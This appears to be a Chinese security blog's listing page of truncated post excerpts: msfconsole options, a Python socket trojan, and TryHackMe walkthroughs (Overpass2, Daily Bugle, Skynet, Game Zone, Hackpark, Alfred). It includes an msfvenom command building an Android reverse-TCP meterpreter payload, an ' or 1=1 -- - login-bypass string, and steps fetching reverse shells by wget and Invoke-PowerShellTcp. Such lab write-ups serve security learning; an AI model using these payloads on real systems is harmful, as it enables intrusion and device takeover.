msfconsole命令集0x01 参数-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列

python爬虫脚本编写 简介：Python爬虫，又称为网络爬虫或网页蜘蛛，是一种自动化浏览互联网并抓取网页信息的程序。Python因其简洁的语法、丰富的库支持（如requests、BeautifulSoup、Scrapy等）以及强大的网络

Python：socket实现简单木马 ps：实现无限挂后台 原理：将目标机本身作为TCP协议服务器，开启本网卡所有监听，由攻击机远程socket连接，实现命令执行 附上源码： # 服务器端木马源码： import socket imp

TryHackMe系列之overpass2hacked 当作为运营人员时，发现了异常并且抓到了流量包，此时就可以对pcap文件进行解析，溯源黑客的攻击过程。 输入http查看网页端访问流量： 右击选取追踪流TCP查看相应的http的访问：

浅试kali渗透安卓 生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=5556 R >

TryHackMe系列之daily bugle 信息收集 访问80端口： Joomlascan工具dirsearch扫描目录发现/administrator路径 同时也发现/README.txt,访问可以发现joom

TryHackMe系列之Skynet 信息收集 有smb服务，以及22、80端口 shell获取打开80端口，啥也没有 用diresearch扫描，发现目录/squirrelmail 访问： smb服务信息收集 使用nma

TryHackMe系列之Game Zone 信息收集 sql注入登录为单引号闭合，在账号框输入 'or 1=1 -- - 成功登录下一个界面，查询页面抓包，保存至burp.txt文件准备利用sqlmap进行注入攻击

TryHackMe系列之Hackpark 思路总结web查找漏洞突破web服务进入靶机获取普通shell，本地开启http服务，靶机利用shell wget下载msfconsole生成的反弹shell文件到temp文件夹，载入PEASS-n

TryHackMe系列之Alfred 思路总结JenKins项目创建选择window命令执行，写好攻击命令，选择build now 执行下载Invoke-PowerShellTcp.ps1脚本并执行获取普通shell，同样利用shell获取